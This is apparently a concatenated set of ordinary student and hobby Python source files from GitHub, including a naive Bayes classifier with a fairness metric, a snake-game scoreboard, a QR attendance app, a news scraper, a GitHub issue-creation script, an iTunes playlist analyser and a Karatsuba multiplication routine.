a\n# a class, sklearn style. You only need to modify the fit and predict functions.\n# Additionally, implement the Disparate Impact measure as the evaluateBias function.\nclass NBC(BaseEstimator):\n '''\n (a,b) - Beta prior parameters for the class random variable\n alpha - Symmetric Dirichlet parameter for the features\n '''\n\n def __init__(self, a=1, b=1, alpha=1):\n self.a = a\n self.b = b\n self.alpha = alpha\n self.__params = None\n \n def get_a(self):\n return self.a\n\n def get_b(self):\n return self.b\n\n def get_alpha(self):\n return self.alpha\n\n # you need to implement this function\n\n def fit(self,X,y):\n '''\n This function does not return anything\n \n Inputs:\n X: Training data set (N x d numpy array)\n y: Labels (N length numpy array)\n '''\n a = self.get_a()\n b = self.get_b()\n alpha = self.get_alpha()\n self.__classes = np.unique(y)\n params = {}\n # remove next line and implement from here\n # you are free to use any data structure for paramse\n \n oneValues = np.count_nonzero(y == 1)\n twoValues = np.count_nonzero(y == 2)\n \n theta1 = (oneValues + a) / (y.size + a + b)\n theta2 = 1 - theta1\n \n thetaTuple = (theta1, theta2)\n list_Y1 = {}\n list_Y2 = {}\n \n for j in range(X.shape[1]):\n list_Y1[j] = {}\n list_Y2[j] = {}\n \n kJ = np.unique(X[:,j]).shape[0]\n mJ = np.max(X[:,j])\n \n for k in range (0, mJ+1):\n s = 0\n s2 = 0\n \n for l in range (X.shape[0]):\n if k == X[l][j] and y[l] == 1:\n s = s + 1\n for l in range (X.shape[0]):\n if k == X[l][j] and y[l] == 2:\n s2 = s2 + 1 \n \n ans1 = (s + alpha) / (oneValues + kJ*alpha)\n \n ans2 = (s2 + alpha) / (twoValues + kJ*alpha)\n \n list_Y1[j][k] = ans1\n list_Y2[j][k] = ans2\n \n \n list_Y1[j][-1] = (alpha) / (oneValues + kJ*alpha)\n list_Y2[j][-1] = (alpha) / (twoValues + kJ*alpha)\n \n params = (thetaTuple, list_Y1, list_Y2)\n \n \n # do not change the line below\n self.__params = params\n \n # you need to implement this function\n def predict(self,Xtest):\n '''\n This function returns the predicted class for a given data set\n \n Inputs:\n Xtest: Testing data set (N x d numpy array)\n \n Output:\n predictions: N length numpy array containing the predictions\n '''\n params = self.__params\n a = self.get_a()\n b = self.get_b()\n alpha = self.get_alpha()\n #remove next line and implement from here\n j = 0\n predictions = []\n for j in range (Xtest.shape[0]):\n y1 = params[0][0]\n y2 = params[0][1]\n \n #find given product of Xj when y = 1 and y= 2\n prod1 = 1\n prod2 = 1\n for k in range (Xtest.shape[1]):\n temp = Xtest[j][k] \n \n #when attribute k has y = 1\n #when attribute k has y = 1\n #1 means the first library\n #k means each attribute\n #temp is the feature of kth attribute that jth person has\n if(temp in params[1][k].keys()):\n val1 = params[1][k][temp]\n else:\n val1 = params[1][k][-1]\n if(temp in params[2][k].keys()):\n #when attribute k has y = 2\n val2 = params[2][k][temp]\n else:\n val2 = params[2][k][-1]\n prod1 = prod1 * val1\n prod2 = prod2 * val2\n \n forYes = (y1 * prod1) / ((y1 * prod1) + (y2 * prod2))\n forNo = (y2 * prod2) / ((y2 *prod2) + (y1 * prod1))\n \n if forYes > forNo:\n predictions.append(1)\n else:\n predictions.append(2)\n #do not change the line below\n return predictions\n \ndef evaluateBias(y_pred,y_sensitive):\n '''\n This function computes the Disparate Impact in the classification predictions (y_pred),\n with respect to a sensitive feature (y_sensitive).\n \n Inputs:\n y_pred: N length numpy array\n y_sensitive: N length numpy array\n \n Output:\n di (disparateimpact): scalar value\n '''\n arrayS = np.count_nonzero(y_sensitive == 1)\n arrayNS = np.count_nonzero(y_sensitive == 2)\n \n \n numeratorVal = 0\n denominatorVal = 0\n \n for i in range(y_pred.size):\n if (y_pred[i] == 2 and y_sensitive[i] != 1):\n numeratorVal += 1\n \n elif (y_pred[i] == 2 and y_sensitive[i] == 1):\n denominatorVal += 1\n \n \n numeratorVal = numeratorVal/arrayNS\n denominatorVal = denominatorVal/arrayS\n \n di = numeratorVal/denominatorVal\n\n return di\ndef genBiasedSample(X,y,s,p,nsamples=1000):\n '''\n Oversamples instances belonging to the sensitive feature value (s != 1)\n \n Inputs:\n X - Data\n y - labels\n s - sensitive attribute\n p - probability of sampling unprivileged customer\n nsamples - size of the resulting data set (2*nsamples)\n \n Output:\n X_sample,y_sample,s_sample\n '''\n i1 = y == 1 # good\n i1 = i1[:,np.newaxis]\n i2 = y == 2 # bad\n i2 = i2[:,np.newaxis]\n \n sp = s == 1 #privileged\n sp = sp[:,np.newaxis]\n su = s != 1 #unprivileged\n su = su[:,np.newaxis]\n su1 = np.where(np.all(np.hstack([su,i1]),axis=1))[0]\n su2 = np.where(np.all(np.hstack([su,i2]),axis=1))[0]\n sp1 = np.where(np.all(np.hstack([sp,i1]),axis=1))[0]\n sp2 = np.where(np.all(np.hstack([sp,i2]),axis=1))[0]\n inds = []\n for i in range(nsamples):\n u = stats.bernoulli(p).rvs(1)\n if u == 1:\n #sample one bad instance with s != 1\n inds.append(np.random.choice(su2,1)[0])\n #sample one good instance with s == 1\n inds.append(np.random.choice(sp1,1)[0])\n else:\n #sample one good instance with s != 1\n inds.append(np.random.choice(su1,1)[0])\n #sample one bad instance with s == 1\n inds.append(np.random.choice(sp2,1)[0])\n X_sample = X[inds,:]\n y_sample = y[inds]\n s_sample = s[inds]\n \n return X_sample,y_sample,s_sample,inds\n","repo_name":"PurpleFlare/474-Project-3","sub_path":"nbFUctions.py","file_name":"nbFUctions.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12185948723","text":"from turtle import Turtle\n\nALIGN = \"center\"\nFONT = ('Consolas', 18, 'normal')\nGAMEOVR_FONT = (\"sans-serif\", 30, 'bold')\nTOP_GAP = 30\n\nwith open('hi_score.txt', mode='r') as file:\n hi_score = int(file.read())\n\nprint(hi_score)\nclass ScoreBoard(Turtle):\n def __init__(self, scn_height):\n super().__init__()\n self.score = 0\n self.high_score = hi_score\n self.hideturtle()\n self.penup()\n self.speed('fastest')\n self.goto(x=0, y=scn_height/2 - TOP_GAP)\n self.color('white')\n\n def display_score(self):\n self.clear()\n text = f\"Score: {self.score} Highscore: {self.high_score}\"\n self.write(text, move=False, align=ALIGN, font=FONT)\n\n def reset_scoreboard(self):\n if self.score > self.high_score:\n self.high_score = self.score\n with open('hi_score.txt', mode='w') as file:\n file.write(str(self.high_score))\n\n self.score = 0\n\n # def display_game_over(self):\n # self.goto(0, 0)\n # game_ovr_txt = \"GAME OVER\"\n # self.color('red')\n # self.write(game_ovr_txt, move=False, align=ALIGN, font=GAMEOVR_FONT)\n # self.goto(0, -20)\n # self.color('white')\n # self.write(f'Final Score: {self.score}', move=False, align=ALIGN, font=FONT)\n\n def increment_score(self):\n self.score += 1\n self.display_score()","repo_name":"LucasLeow/PythonBootCamp","sub_path":"20_SnakeGame/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19524782369","text":"\r\nfrom kivymd.app import MDApp\r\nfrom kivy.lang import Builder\r\nfrom pyzbar.pyzbar import ZBarSymbol\r\nfrom kivymd.uix.snackbar import Snackbar\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\n\r\nKV = \"\"\"\r\n\r\n#:import ZBarCam kivy_garden.zbarcam.ZBarCam\r\n#:import ZBarSymbol pyzbar.pyzbar.ZBarSymbol\r\nMDBoxLayout:\r\n\torientation:'vertical'\r\n\tZBarCam:\r\n\t\tid:zbarcam\r\n\t\tcode_types:ZBarSymbol.QRCODE.value,ZBarSymbol.EAN13.value\r\n\t\ton_symbols:app.on_symbols(*args)\r\n\t\t\r\n\r\n\"\"\"\r\n\r\nnombres = []\r\nmatriculas = []\r\nfecha = ''\r\nhora = ''\r\ncount = '0'\r\n\r\nclass my_app(MDApp):\r\n\t\"\"\"docstring for my_app\"\"\"\r\n\r\n\tdef build(self):\r\n\t\tself.root = Builder.load_string(KV)\r\n\r\n\tdef on_symbols(self, instance, symbols):\r\n\t\tif not symbols == \"\":\r\n\t\t\tfor symbol in symbols:\t\t\t\t\r\n\t\t\t\t# print(f'Your QR is: {symbol.data.decode()}')\r\n\t\t\t\tSnackbar(\r\n\t\t\t\t\ttext = f'Estudiante: {symbol.data.decode()}.',\r\n\t\t\t\t\tmd_bg_color = 'green',\r\n\t\t\t\t\tfont_size = 25\r\n\t\t\t\t).open()\r\n\t\t\t\tvalores = symbol.data.decode().split(\",\")\r\n\t\t\t\tif not (valores[0] in nombres) and not (valores[1] in matriculas):\r\n\t\t\t\t\tnombres.append(valores[0])\r\n\t\t\t\t\tmatriculas.append(valores[1])\r\n\t\t\t\t\tahora = datetime.datetime.now()\r\n\t\t\t\t\tfecha = ahora.strftime('%d/%m/%Y')\r\n\t\t\t\t\thora = ahora.strftime('%H:%M:%S')\r\n\r\n\t\t\t\tdata = {\r\n\t\t\t\t\t'nombre': nombres,\r\n\t\t\t\t\t'matricula': matriculas,\r\n\t\t\t\t\t'fecha': fecha,\r\n\t\t\t\t\t'hora': hora\r\n\t\t\t\t}\r\n\t\t\t\tdf = pd.DataFrame(data)\r\n\r\n\t\t\t\tdf.to_excel(f'asistencia.xlsx')\r\n\r\n\t\t\t\texcel = pd.read_excel('asistencia.xlsx')\r\n\t\t\t\tcount = str(len(excel))\r\n\t\t\t\tprint(count)\r\n\r\nif __name__ == '__main__':\r\n\tmy_app().run()\r\n\r\n\"\"\"\r\nfrom kivy import *\r\nfrom kivy.app import App\r\nfrom kivy.uix import *\r\n\r\n'''\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.graphics.texture import Texture\r\nfrom kivy.uix.camera import Camera\r\nfrom kivy.lang import Builder\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nBuilder.load_file(\"main.kv\")\r\n\r\nclass AndroidCamera(Camera):\r\n camera_resolution = (640, 480)\r\n counter = 0\r\n\r\n\r\n def _camera_loaded(self, *largs):\r\n self.texture = Texture.create(size=np.flip(self.camera_resolution), colorfmt='rgb')\r\n self.texture_size = list(self.texture.size)\r\n\r\n def on_tex(self, *l):\r\n if self._camera._buffer is None:\r\n return None\r\n frame = self.frame_from_buf()\r\n\r\n self.frame_to_screen(frame)\r\n super(Camera, self).on_tex(*l)\r\n\r\n def frame_from_buf(self):\r\n w, h = self.resolution\r\n frame = np.frombuffer(self._camera._buffer.tostring(), 'uint8').reshape((h + h // 2, w))\r\n frame_bgr = cv2.cvtColor(frame, 93)\r\n return np.rot90(frame_bgr, 3)\r\n\r\n def frame_to_screen(self, frame):\r\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n cv2.putText(frame_rgb, str(self.counter), (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)\r\n self.counter += 1\r\n flipped = np.flip(frame_rgb, 0)\r\n buf = flipped.tostring()\r\n self.texture.blit_buffer(buf, colorfmt='rgb', bufferfmt='ubyte')\r\n\r\nclass MyLayout(BoxLayout):\r\n pass\r\n\r\n\r\nclass MyApp(App):\r\n def build(self):\r\n return MyLayout()\r\n\r\n\r\nif __name__ == '__main__':\r\n MyApp().run()\r\n\r\n'''\r\nfrom kivy import *\r\nfrom kivy.app import App\r\nfrom kivy.uix import *\r\nfrom kivy.uix.relativelayout import RelativeLayout\r\nfrom kivy.uix.camera import Camera\r\n\r\n\r\n'''\r\nclass mainApp(App):\r\n\tdef build(self):\r\n\t\tpass\r\n\r\nmainApp().run()\r\n\r\n'''\r\nclass miCamara(App):\r\n\t'''docstring for Camara'''\r\n\tdef build(self):\r\n\t\trl = RelativeLayout()\r\n\t\tcam = AndroidCamera(resolution = (320, 240), size = (500, 300), pos = (0, 0), play = True )\r\n\t\trl.add_widget(cam)\r\n\t\treturn rl\r\nmiCamara().run()\r\n\"\"\"\r\n","repo_name":"numbasan-san/asistencia_qr","sub_path":"Lector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15170285750","text":"import os\r\nfilename = input('enter file name (.txt): ')\r\nif os.path.exists(filename):\r\n openfile = open(filename, 'r') #Precise accessibility, edit open(filename, 'path', 'r') \r\n for count, ofl in enumerate(openfile):\r\n print(f\"\\nentry({count}): {ofl}\")\r\n count += 1 #due to \"forloop\" started on index \"0\". \r\n print(f\"\\nnumber of entry: {count}\")\r\nelse:\r\n print(\"file not found, please check and try again.\")\r\n","repo_name":"BenjySoh/jubilant-garbanzo","sub_path":"filemanipulation.py","file_name":"filemanipulation.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28766538360","text":"from dotenv import load_dotenv\nimport os\nimport numpy as np\n\nload_dotenv()\ncompany_size = int(os.getenv(\"COMPANIES_SIZE\"))\n\nflow_stack = []\n\nmarket_margin = [0] * company_size\n# coefficient = value * margin\n# value up, margin down\nmarket_margin_coefficient = []\nfor i in range(company_size):\n market_margin_coefficient.append(np.random.randint(low=100, high=500) / 100)\n\nbank_balance = 0\n","repo_name":"megathere/eco-simulator","sub_path":"src/constant/market_constants.py","file_name":"market_constants.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28740133324","text":"import json\nfrom github import Github\n\nconfig = json.loads(open('./config/config.json', 'r').read())\n\ngithub_api = Github(login_or_token=config['auth']['github']['token'])\n\nselected_repo = None\n\nrepo_url = None\ni = 1\n\nprint('Select project:')\nfor project_to_pick in config['projects']:\n repo_uri = config['projects'][i-1]['uri']\n print('{0} - {1}'.format(i, repo_uri))\n i += 1\n\nproject_number = int(input('Select project:'))\nrepo_uri = config['projects'][project_number-1]['uri']\n\nrepo = github_api.get_repo(repo_uri)\n\nprint(\"Selected project: {0}\".format(repo_uri))\n\ndefault_labels = [\n repo.get_label(\"help wanted\")\n]\n\nprint(\"\\nDefault issue labels:\")\nfor label in default_labels:\n print(\"'{0}'\".format(label.name))\nprint('***')\n\nissue_type_labels = [\n repo.get_label(\"enhancement\"),\n repo.get_label(\"bug\"),\n repo.get_label(\"documentation\"),\n]\n\nwhile True:\n try:\n issue_title = str(input('Type issue title:'))\n\n issue_labels = default_labels.copy()\n\n print('Select issue type:')\n i = 1\n for type_label in issue_type_labels:\n print('{0} - {1}'.format(i, type_label.name))\n i += 1\n selected_type_index = int(input('Enter number:')) - 1\n\n issue_labels.append(issue_type_labels[selected_type_index])\n\n print(issue_labels)\n\n created_issue = repo.create_issue(title=issue_title, labels=issue_labels)\n\n print(created_issue)\n print('Issue #{0} was created!'.format(created_issue.number))\n print('Issue url: https://github.com/{0}/issues/{1}'.format(repo_uri,created_issue.number))\n print('***\\n')\n except Exception as e:\n print(e)\n print('Error!\\n\\n')\n","repo_name":"mx2s/github-automation","sub_path":"src/create_issues.py","file_name":"create_issues.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9112120546","text":"# -*- coding: UTF-8 -*-\r\n# 中国江苏网-新闻\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport json\r\nimport codecs\r\n\r\n\r\ndef get_article_url(url, headers):\r\n req = requests.get(url,headers=headers)\r\n data = req.text\r\n fp = codecs.open('test/error.txt','a+', 'utf-8')\r\n fp.write(data)\r\n fp.close()\r\n soup = BeautifulSoup(data,'lxml')\r\n article_list = soup.find_all('div',attrs={'class':'biaot'})\r\n urls = []\r\n for article in article_list:\r\n article_time = article.find('span').getText()[:10]\r\n day = int(article_time[8:10])\r\n month = int(article_time[5:7])\r\n now_month = int(time.localtime(time.time())[1])\r\n now_day = int(time.localtime(time.time())[2])\r\n if day == now_day and month == now_month:\r\n article_url = 'http://jsnews.jschina.com.cn/jsyw/'+article.find('a')['href'][1:]\r\n urls.append(article_url)\r\n else:\r\n break\r\n return urls\r\n\r\ndef get_article(url, headers,count):\r\n req = requests.get(url, headers=headers)\r\n data = req.content\r\n soup = BeautifulSoup(data,'lxml')\r\n title = soup.find('div',attrs={'class':'text'}).find('h2').getText()\r\n article_time = soup.find('div',attrs={'class':'text'}).find('div',attrs={'class':'info'}).find('span',attrs={'id':'pubtime_baidu'}).getText()[:10]\r\n body = soup.find('div',attrs={'class':'article'}).find_all('p')\r\n folder = article_time+'jsxww%s.txt'%count\r\n fp = codecs.open('data/article.csv','a+', 'utf-8')\r\n fp.write(title+','+article_time+','+url+','+folder+'\\r\\n')\r\n fp.close()\r\n fp = codecs.open('articles/'+folder, 'a+', 'utf-8')\r\n for b in body:\r\n text = b.getText()\r\n fp.write(text+'\\r\\n')\r\n fp.close()\r\n\r\n\r\ndef main():\r\n init_url = ['http://jsnews.jschina.com.cn/jsyw/index.shtml',\r\n 'http://jsnews.jschina.com.cn/jsyw/index_1.shtml']\r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\r\n }\r\n count = 1\r\n for url in init_url:\r\n urls = get_article_url(url,headers)\r\n for u in urls:\r\n try:\r\n get_article(u,headers,count)\r\n count += 1\r\n fp = codecs.open('data/log.txt','a+', 'utf-8')\r\n fp.write('Succeed. '+url+'\\r\\n')\r\n fp.close()\r\n except:\r\n fp = codecs.open('data/log.txt','a+', 'utf-8')\r\n fp.write('Failed. '+url+'\\r\\n')\r\n fp.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"kourou1034/Python-Spider","sub_path":"spider_news/spider_jsnews.py","file_name":"spider_jsnews.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6923937420","text":"import plistlib\r\nfrom matplotlib import pyplot\r\nimport numpy as np\r\nimport sys\r\nimport re, argparse\r\nimport random\r\n\r\ndef findDuplicates(fileName):\r\n \"\"\"This function searches for duplicate tracks in an iTunes playlist.\"\"\"\r\n print('Finding duplicate tracks in %s...' % fileName)\r\n with open(fileName, 'rb') as file:\r\n plist = plistlib.load(file) # Read in the playlist file\r\n tracks = plist['Tracks'] # Access the tracks dictionary in the playlist XML file\r\n trackNames = {} # Dictionary to store duplicate tracks\r\n\r\n for trackID, track in tracks.items():\r\n try:\r\n name = track['Name']\r\n duration = track['Total Time']\r\n\r\n # Check if the names match and if the rounded down durations match. \r\n # Floor divide by 1000 to round to the nearest second since Apple stores duration as miliseconds\r\n if name in trackNames and duration//1000 == trackNames[name][0]//1000:\r\n count = trackNames[name][1]\r\n trackNames[name] = (duration, count + 1) # trackNames is a dictionary in which the value is a pair \r\n # containing the track's duration and the number of appearances that track has\r\n else:\r\n trackNames[name] = (duration, 1)\r\n\r\n except:\r\n pass\r\n duplicates = []\r\n for key, value in trackNames.items():\r\n # Check if the count is greater than 1\r\n if value[1] > 1:\r\n duplicates.append((value[1], key)) # Save the count and the name of the track \r\n if len(duplicates) > 0:\r\n print(\"Found % d duplicates. Track names saved to duplicates.txt\" % len(dups))\r\n else:\r\n print(\"No duplicates found.\")\r\n\r\n file = open(\"duplicates.txt\", 'w')\r\n for value in duplicates:\r\n file.write(\"[%d] %s\\n\" % (val[0], val[1])) # Write the count and the name of the track\r\n file.close()\r\n\r\ndef findCommonTracks(fileNames):\r\n \"\"\"This function attempts to find common tracks across multiple different iTunes playlists.\"\"\"\r\n trackNameSets = []\r\n for fileName in fileNames:\r\n trackNames = set() # Create a set for each playlist in order to compare them through set intersection\r\n with open(fileName, 'rb') as file:\r\n plist = plistlib.load(file)\r\n tracks = plist['Tracks']\r\n for trackID, track in tracks.items():\r\n try: \r\n trackNames.add((track['Name'], track['Total Time']//1000)) # Add the track in as a pair of name, duration\r\n except:\r\n pass\r\n trackNameSets.append(trackNames)\r\n commonTracks = set.intersection(*trackNameSets) # Intersect the two sets to find the common tracks matched by name and duration\r\n if len(commonTracks) > 0:\r\n file = open(\"comon.txt\", 'w')\r\n for value in commonTracks:\r\n file.write(\"%s\\n\" % str(value)) # Use encode to ensure that unicode characters are saved\r\n file.close()\r\n print(\"%d common tracks found. Track names written to common.txt\" % len(commonTracks))\r\n else:\r\n print(\"No common tracks.\")\r\n\r\ndef plotStats(fileName):\r\n \"\"\"This function plots creates a scatter plot, histogram, and a bar chart of statistics for a given playlist.\"\"\"\r\n with open(fileName, 'rb') as file:\r\n plist = plistlib.load(file)\r\n tracks = plist['Tracks']\r\n ratings = []\r\n durations = []\r\n\r\n # Loop through the tracks dictionary and add ratings to ratings list and durations to durations list\r\n for trackID, track in tracks.items():\r\n durations.append(track['Total Time'])\r\n # ratings.append(track['Album Rating']) appending the actual album rating only works if there is a rating for every single \r\n # song in the playlist, so for the sake of experimentation we will fabricate random album ratings\r\n ratings.append(random.randint(0, 100))\r\n\r\n if ratings == [] or durations == []:\r\n print(\"No valid album rating or total time data in %s.\" % fileName)\r\n return\r\n\r\n x = (np.array(durations, np.int32)) / 60000.0 # Divide by 60000.0 to convert miliseconds to seconds\r\n y = np.array(ratings, np.int32)\r\n\r\n # Create scatterplot\r\n pyplot.subplot(2, 1, 1)\r\n pyplot.plot(x, y, 'o')\r\n pyplot.axis([0, 1.05 * np.max(x), -1, 110]) # This alters the x and y axis to give the scatter plot some padding\r\n pyplot.xlabel('Track Duration')\r\n pyplot.ylabel('Count')\r\n\r\n # Create histogram\r\n pyplot.subplot(2, 1, 2)\r\n pyplot.hist(x, bins=20)\r\n pyplot.xlabel('Track Duration')\r\n pyplot.ylabel('Count')\r\n\r\n # Create Bar Chart\r\n\r\n\r\n pyplot.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n description = \"\"\"This program parses iTunes playlist files as exported in .xml format.\"\"\"\r\n\r\n parser = argparse.ArgumentParser(description=description) # Create the parser and a group which limits the command line arguments to 1\r\n group = parser.add_mutually_exclusive_group()\r\n\r\n group.add_argument('--common', nargs='*', dest='plFiles', required=False)\r\n group.add_argument('--stats', dest='plFile', required=False)\r\n group.add_argument('--duplicates', dest='plFileD', required=False)\r\n\r\n args = parser.parse_args()\r\n\r\n if args.plFiles:\r\n findCommonTracks(args.plFiles)\r\n elif args.plFile:\r\n plotStats(args.plFile)\r\n elif args.plFileD:\r\n findDuplicates(args.plFileD)\r\n else:\r\n print(\"These are not the tracks you are looking for.\")\r\n","repo_name":"racerbren/iTunes-Playlist-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10657444995","text":"def czyDoskonala(n):\n\td = []\n\n\tfor i in range(1, n-1):\n\t\tif n%i == 0:\n\t\t\td.append(i)\n\n\tif sum(d) == n:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == '__main__':\n\t\n\tl = int(input(\"Podaj liczbę: \"))\n\n\tif czyDoskonala(l):\n\t\tprint(\"Liczba jest doskonała\")\n\n\telse:\n\t\tprint(\"Liczba nie jest doskonała\")","repo_name":"dragenet/matura-informatyka-python","sub_path":"2_liczby_doskonale/czydoskonala.py","file_name":"czydoskonala.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7237075023","text":"import pandas as pd\nimport requests\nimport json\nimport os\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\ndf = pd.DataFrame()\nyears = ['2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']\nkey = os.environ.get('CENSUS_KEY')\nfields_pre_2017 = 'DP05_0001E,DP05_0005E,DP05_0006E,DP05_0007E,DP05_0059E,DP05_0060E,DP05_0061E,DP05_0062E,DP05_0063E,DP05_0064E'\nfields_post_2016 = 'DP05_0001E,DP05_0005E,DP05_0006E,DP05_0007E,DP05_0064E,DP05_0065E,DP05_0066E,DP05_0067E,DP05_0068E,DP05_0069E'\nzip_codes = '37302,37315,37321,37341,37343,37350,37363,37373,37377,37379,37402,37403,37404,37405,37406,37407,37408,37409,37410,37411,37412,37415,37416,37419,37421'\n\nfield_mapping_post_2016 = {\n 'DP05_0001E': 'TOTAL POPULATION',\n 'DP05_0005E': 'TOTAL POPULATION_UNDER 5 YEARS',\n 'DP05_0006E': 'TOTAL POPULATION_5 TO 9 YEARS',\n 'DP05_0007E': 'TOTAL POPULATION_10 TO 14 YEARS',\n 'DP05_0064E': 'TOTAL POPULATION_WHITE',\n 'DP05_0065E': 'TOTAL POPULATION_BLACK OR AFRICAN AMERICAN',\n 'DP05_0066E': 'TOTAL POPULATION_AMERICAN INDIAN AND ALASKA NATIVE',\n 'DP05_0067E': 'TOTAL POPULATION_ASIAN',\n 'DP05_0068E': 'TOTAL POPULATION_NATIVE HAWAIIAN AND OTHER PACIFIC ISLANDER',\n 'DP05_0069E': 'TOTAL POPULATION_SOME OTHER RACE',\n \"zip code tabulation area\": \"ZIPCODE\",\n}\n\nfields_mapping_pre_2017 = {\n'DP05_0001E': 'TOTAL POPULATION',\n'DP05_0005E': 'TOTAL POPULATION_UNDER 5 YEARS',\n'DP05_0006E': 'TOTAL POPULATION_5 TO 9 YEARS',\n'DP05_0007E': 'TOTAL POPULATION_10 TO 14 YEARS',\n'DP05_0059E': 'TOTAL POPULATION_WHITE',\n'DP05_0060E': 'TOTAL POPULATION_BLACK OR AFRICAN AMERICAN',\n'DP05_0061E': 'TOTAL POPULATION_AMERICAN INDIAN AND ALASKA NATIVE',\n'DP05_0062E': 'TOTAL POPULATION_ASIAN',\n'DP05_0063E': 'TOTAL POPULATION_NATIVE HAWAIIAN AND OTHER PACIFIC ISLANDER',\n'DP05_0064E': 'TOTAL POPULATION_SOME OTHER RACE',\n\"zip code tabulation area\": \"ZIPCODE\",\n}\n\n\nfor year in years:\n\n if df.empty:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_pre_2017}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}' \n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df=pd.DataFrame(data[1:], columns=data[0]).rename(columns=fields_mapping_pre_2017)\n df['YEAR'] = year\n df.drop(columns=['NAME', 'state'],inplace=True)\n\n elif year in ['2011', '2012', '2013', '2014', '2015', '2016',]:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_pre_2017}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}'\n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=fields_mapping_pre_2017)\n df2.drop(columns=['NAME', 'state'],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n\n elif year in ['2017', '2018', '2019']:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_post_2016}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}'\n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=field_mapping_post_2016)\n df2.drop(columns=['NAME', 'state'],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n else:\n url_post_2019 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_post_2016}&for=zip%20code%20tabulation%20area:{zip_codes}&key={key}'\n response = requests.request(url=url_post_2019, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=field_mapping_post_2016)\n df2.drop(columns=['NAME',],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n\ncity_mapping = {\n '37302': 'Apison',\n '37315': 'Collegedale',\n '37321': 'Dayton',\n '37341': 'Harrison',\n '37343': 'Hixson',\n '37350': 'Lookout Mountain',\n '37363': 'Ooltewah',\n '37373': 'Sale Creek',\n '37377': 'Signal Mountain',\n '37379': 'Soddy Daisy',\n '37402': 'Chattanooga',\n '37403': 'Chattanooga',\n '37404': 'Chattanooga',\n '37405': 'Chattanooga',\n '37406': 'Chattanooga',\n '37407': 'Chattanooga',\n '37408': 'Chattanooga',\n '37409': 'Chattanooga',\n '37410': 'Chattanooga',\n '37411': 'Chattanooga',\n '37412': 'Chattanooga',\n '37415': 'Chattanooga',\n '37416': 'Chattanooga',\n '37419': 'Chattanooga',\n '37421': 'Chattanooga',\n}\n\ndf = df.reset_index(drop=True)\ndf['CITY'] = df['ZIPCODE'].map(city_mapping)","repo_name":"crumblbear/TNChildCare","sub_path":"ChildCareTN/census_dp05.py","file_name":"census_dp05.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2784885537","text":"# Karatsuba's Algorithm\n# when n is a power of 2\n\ndef multiply(x,y,n):\n if n == 1:\n return int(x)*int(y)\n a = x[:n//2]\n b = x[n//2:]\n c = y[:n//2]\n d = y[n//2:]\n return (pow(10,n)*multiply(a,c,n//2)) + (pow(10,n//2)*(multiply(a,d,n//2)+multiply(b,c,n//2))) + multiply(b,d,n//2)\n\n\nif __name__ == \"__main__\":\n print(multiply('1234','9876',4))\n 